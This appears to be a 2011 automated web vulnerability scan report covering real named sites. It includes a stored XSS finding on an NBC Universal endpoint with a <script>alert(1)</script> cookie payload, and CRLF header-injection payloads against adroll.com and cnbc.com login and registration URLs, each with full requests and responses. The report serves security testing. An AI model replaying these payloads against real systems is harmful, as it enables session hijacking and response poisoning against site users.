29.75. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg
29.76. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif
29.77. http://www.rayalab.com/Scripts/AC_RunActiveContent.js
29.78. http://www.rayalab.com/animate.js
29.79. http://www.rayalab.com/favicon.ico
29.80. http://www.rayalab.com/flexcroll.js
29.81. http://www.resourcepoint.net/form.htm
29.82. http://www.revsolutionsinc.com/animated_favicon1.gif
29.83. http://www.sophelle.com/graphic/bullet-sm-w.gif
29.84. http://www.sophelle.com/images/sophelle-ico.ico
30. HTML uses unrecognised charset
31. Content type incorrectly stated
31.1. http://4qinvite.4q.iperceptions.com/1.aspx
31.2. http://a1.interclick.com/getInPageJS.aspx
31.3. http://a1.interclick.com/getInPageJSProcess.aspx
31.4. https://account.bigcommerce.com/mailer/form.php
31.5. http://ad.doubleclick.net/clk
31.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
31.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
31.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
31.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
31.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
31.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
31.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
31.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
31.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
31.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
31.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
31.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
31.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
31.19. http://ads.pointroll.com/PortalServe/
31.20. http://api-cdn.cnbc.com/api/chart/chart.asp
31.21. http://api.cnbc.com/api/chart/chart.asp
31.22. http://api.viglink.com/api/ping
31.23. http://apps.cnbc.com/Includes/CheckPng/Script.asp
31.24. http://assets1.csc.com/contact_us/media/contact_us4.css
31.25. http://assets1.csc.com/services/media/services3.css
31.26. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php
31.27. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php
31.28. http://blog.harbottle.com/dm/xmlrpc.php
31.29. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js
31.30. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
31.31. http://blogs.oracle.com/otn/resource/SunOracle.png
31.32. http://blogs.oracle.com/otn/resource/java-logo.png
31.33. http://blogs.oracle.com/theme/scripts/clientSideInclude.js
31.34. http://blogs.oracle.com/theme/scripts/roller.js
31.35. http://content.plymedia.com/initialize
31.36. http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load
31.37. http://education.oracle.com/education/css/oracle.css
31.38. http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries
31.39. https://event.on24.com/eventRegistration/prereg/register.jsp
31.40. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
31.41. https://forums.oracle.com/forums/themes/english/resources/info_company.gif
31.42. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
31.43. https://forums.oracle.com/forums/themes/english/resources/otn_new.css
31.44. https://forums.oracle.com/forums/themes/english/resources/s_code.js
31.45. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
31.46. https://forums.oracle.com/forums/themes/english/resources/spacer.gif
31.47. https://forums.oracle.com/forums/themes/english/resources/style.css
31.48. http://goku.brightcove.com/1pix.gif
31.49. http://imp.fetchback.com/serve/fb/adtag.js
31.50. http://l.apture.com/v3/
31.51. http://m.cnbc.com/mytest/ipecho.php
31.52. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/
31.53. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/
31.54. http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/
31.55. http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81
31.56. http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14
31.57. http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel
31.58. https://myprofile.oracle.com/EndUser/images/fading-background.png
31.59. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
31.60. https://myprofile.oracle.com/EndUser/jscripts/s_code.js
31.61. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
31.62. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
31.63. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
31.64. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
31.65. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
31.66. http://now.eloqua.com/visitor/v200/svrGP.aspx
31.67. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js
31.68. http://ping.crowdscience.com/ping.js
31.69. http://pixel.fetchback.com/serve/fb/pdc
31.70. https://register.cnbc.com/RandomImage.jsp
31.71. http://rt.disqus.com/forums/realtime-cached.js
31.72. http://rt.legolas-media.com/lgrt
31.73. http://rww.readwriteweb.netdna-cdn.com/favicon.ico
31.74. http://s7.addthis.com/js/addthis_widget.php
31.75. http://server.iad.liveperson.net/hcp/html/mTag.js
31.76. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
31.77. http://sophelle.app5.hubspot.com/salog.js.aspx
31.78. http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
31.79. http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
31.80. http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
31.81. http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
31.82. http://tps31.doubleverify.com/visit.js
31.83. http://wd.sharethis.com/api/getCount2.php
31.84. http://www.atg.com/favicon.ico
31.85. http://www.atg.com/svc-common/script/propertyFunc.js.jsp
31.86. https://www.atg.com/favicon.ico
31.87. https://www.atg.com/svc-common/script/propertyFunc.js.jsp
31.88. http://www.cnbc.com/id/24596694/
31.89. http://www.facebook.com/extern/login_status.php
31.90. http://www.fekkai.com/js/imageLoader.json
31.91. http://www.gillettevenus.com/favicon.ico
31.92. http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js
31.93. http://www.google.com/search
31.94. http://www.harbottle.com/favicon.ico
31.95. http://www.marykay.com/images/icn_fb.jpg
31.96. http://www.marykay.com/images/icn_yt.jpg
31.97. http://www.netsuite.com/portal/javascript/effects.js
31.98. http://www.netsuite.com/portal/javascript/prototype.js
31.99. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg
31.100. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg
31.101. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg
31.102. http://www.oracle.com/pls/ebn/live_viewer.main
31.103. http://www.oracle.com/pls/ebn/swf_viewer.load
31.104. http://www.oracle.com/pls/ebn/wm_viewer.main
31.105. http://www.sophelle.com/graphic/cq_logo-250.gif
32. Content type is not specified
32.1. http://ads.pointroll.com/PortalServe/
32.2. https://login.oracle.com/mysso/sso_loginui/moc_lib.js
32.3. https://login.oracle.com/mysso/sso_loginui/sso_check.js
32.4. https://login.oracle.com/oam/server/sso/auth_cred_submit
32.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login
32.6. http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js
32.7. http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js
32.8. http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js
1. Cross-site scripting (stored)
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://snas.nbcuni.com
Path:
/snas/api/getRemoteDomainCookies
Issue detail
The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a5fc9<script>alert(1)</script>0f409039ab9 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Issue background
Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application). Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users. Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
Request 1
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1 Host: snas.nbcuni.com Proxy-Connection: keep-alive Referer: http://data.cnbc.com/quotes/.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9
Request 2
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1 Host: snas.nbcuni.com Proxy-Connection: keep-alive Referer: http://data.cnbc.com/quotes/.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15
Response 2
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:11:11 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9; Path=/ Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:11:21 GMT Content-Length: 208 Content-Type: text/html __nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9 ","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});
2. HTTP header injection
previous
next
There are 8 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response. Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 752c7%0d%0afa8ce4cf6fd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pixel/752c7%0d%0afa8ce4cf6fd /3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __adroll=a93684bbe302491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 06 Sep 2011 15:32:47 GMT Connection: keep-alive Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/pixel/752c7 fa8ce4cf6fd /3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 36bd2%0d%0a9786dda38d3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/36bd2%0d%0a9786dda38d3 ?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __adroll=a93684bbe302491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 06 Sep 2011 15:32:48 GMT Connection: keep-alive Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/retarget/EBPLYDUJ5RCZ3C7MBENLBV/36bd2 9786dda38d3 /pixel.js: Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://login.cnbc.com
Path:
/tpauth/rest/authenticate
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 294ce%0d%0adc6a298c2de was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /tpauth/rest/authenticate?source=subscription&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce%0d%0adc6a298c2de =1 HTTP/1.1 Host: login.cnbc.com Proxy-Connection: keep-alive Referer: http://pro.cnbc.com/index.asp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:03:29 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Set-Cookie: JSESSIONID=D2C022C9CFF6DFB9157CD240DA8DE1A9; Path=/tpauth Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce dc6a298c2de =1&login_view=subscription Content-Length: 0 Content-Type: text/plain
2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://login.cnbc.com
Path:
/tpauth/rest/authenticate
Issue detail
The value of the source request parameter is copied into the Location response header. The payload 33200%0d%0a0f3f561d3b4 was submitted in the source parameter. This caused a response containing an injected HTTP header.
Request
GET /tpauth/rest/authenticate?source=33200%0d%0a0f3f561d3b4 &source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp HTTP/1.1 Host: login.cnbc.com Proxy-Connection: keep-alive Referer: http://pro.cnbc.com/index.asp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:03:00 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=33200 0f3f561d3b4 Content-Length: 0 Content-Type: text/plain
2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/memberCenter.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ef6d%0d%0a743079059dd was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /memberCenter.do?4ef6d%0d%0a743079059dd =1 HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:05:52 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&4ef6d 743079059dd =1&login_view=register Content-Length: 0 Connection: close Content-Type: text/plain Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:52 GMT; path=/
2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/refreshlogin.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d0ea7%0d%0a3c7455c6879 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/&d0ea7%0d%0a3c7455c6879 =1 HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:03:20 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&d0ea7 3c7455c6879 =1&login_view=header Content-Length: 0 Connection: close Content-Type: text/plain Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:20 GMT; path=/
2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/refreshlogin.jsp
Issue detail
The value of the source request parameter is copied into the Location response header. The payload 42dc1%0d%0ad1b7bab4e94 was submitted in the source parameter. This caused a response containing an injected HTTP header.
Request
GET /refreshlogin.jsp?source=42dc1%0d%0ad1b7bab4e94 &service=http://www.cnbc.com/ HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:03:19 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=42dc1%0D%0Ad1b7bab4e94&login_view=42dc1 d1b7bab4e94 Content-Length: 0 Connection: close Content-Type: text/plain Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:19 GMT; path=/
2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/registerUser.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bc1b6%0d%0a38769824fca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /registerUser.do?bc1b6%0d%0a38769824fca =1 HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:05:48 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Set-Cookie: JSESSIONID=8949562430B64F70CC4A99E0D5131B41; Path=/ Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Location: http://register.cnbc.com/refreshlogin.jsp?bc1b6 38769824fca =1 Content-Length: 0 Connection: close Content-Type: text/html Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/
3. Cross-site scripting (reflected)
previous
next
There are 100 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make 